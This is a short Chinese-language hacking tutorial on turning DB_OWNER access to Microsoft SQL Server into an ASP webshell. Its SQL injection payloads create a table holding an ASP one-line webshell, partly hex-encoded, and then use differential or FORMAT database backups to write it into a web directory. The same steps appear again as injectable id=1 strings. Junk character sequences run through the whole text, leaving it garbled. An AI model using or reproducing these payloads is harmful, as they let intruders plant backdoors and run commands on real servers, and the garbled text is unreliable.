DB_OWNER权限得到webshell的两点改进:
8 A2 d4 E, ?& o' U, w, A6 J; d$ A* e+ {5 X0 @
减少备份文件大小,得到可执行的webshell成功率提高不少4 s- V& ?/ }6 H7 W5 D# O. c% ~" p' _
一利用差异备份
4 _! z5 v( |) d: N4 V' S+ O/ p加一个参数WITH DIFFERENTIAL
' @6 l4 N* {9 D1 h, o$ f' j) ^, m- d, n0 }* Z
1, L; x1 N6 ^+ V4 k
2" a: H) ^ B; ]3 p
3( ?1 Z5 s/ ]) b6 Y+ A* a0 t
4
: S: E2 R1 f% T& i4 H7 q. B declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
) u' C! z0 F4 I) ?& R" p* ?& Zcreate table [dbo].[xiaolu] ([cmd] [image]);
( X! X( n3 U+ s+ m$ z. W1 f5 Z1 minsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)$ ^4 }* m9 o' {* m: Z+ ]
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL , r T, J5 u8 b5 p
! K7 a( X5 L7 B0 |6 w3 k3 K6 T4 \二利用完全FORMAT
" T& I- |3 g( [# _5 j+ M9 ~加一个参数WITH FROMAT& K" [3 o e) n9 J, R! y
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以$ k* T, `/ _2 q
# J y: A; {" s
1
$ o. A' x7 w( x( c3 j$ p6 W2
0 ?: z5 J4 A3 i1 I3. \* _+ \' A7 T7 @1 r
4
5 V0 }3 _& }: A( i declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s, K* L9 u& R- S B4 J! J
create table [dbo].[xiaolu] ([cmd] [image]);
. Q: b- k- x9 B& }insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)$ V& l/ i- j7 ?
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT 6 q! A0 J& j: Q
% Q( R7 Y- K- `
总的来说就是那么简单几句,下面以备份数据库model为例子
, |7 ^5 @& Y( V1
; u5 j$ \& c$ @# r) o! ~. P
$ M( T3 p& L- u& R% K1$ J* |$ R1 s7 Z8 y7 O1 ]
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') + a* U& m \! u# b9 T8 p3 [
) [4 t! F4 F8 R- j9 a20 m8 X! {5 Z6 l7 K) K" B
* G) a! T; e$ ]4 r1
; b- B; u* d5 { U$ L& @8 b5 s id=1;backup database model to disk='你的路径‘ with differential,format;--
6 l4 L1 r6 D" E' M |